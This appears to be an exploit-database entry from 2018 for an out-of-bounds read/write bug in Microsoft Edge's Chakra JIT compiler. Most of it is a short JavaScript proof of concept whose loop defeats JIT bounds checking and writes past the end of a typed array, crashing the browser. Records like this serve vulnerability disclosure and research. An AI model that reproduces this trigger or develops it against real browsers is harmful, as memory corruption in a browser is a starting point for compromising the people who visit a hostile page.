Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes Exploit

2018-07-20
ID: 98632
CVE: None
Download vulnerable application: None
/*
It seems that this issue is similar to the  issue 1429  (MSRC 42111). It might need to refresh the page several times to observe a crash.
  PoC:
*/
  let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
        i--;
        i++;
    }
      arr[i] = 0x1234;
}
1-4-2 (www02)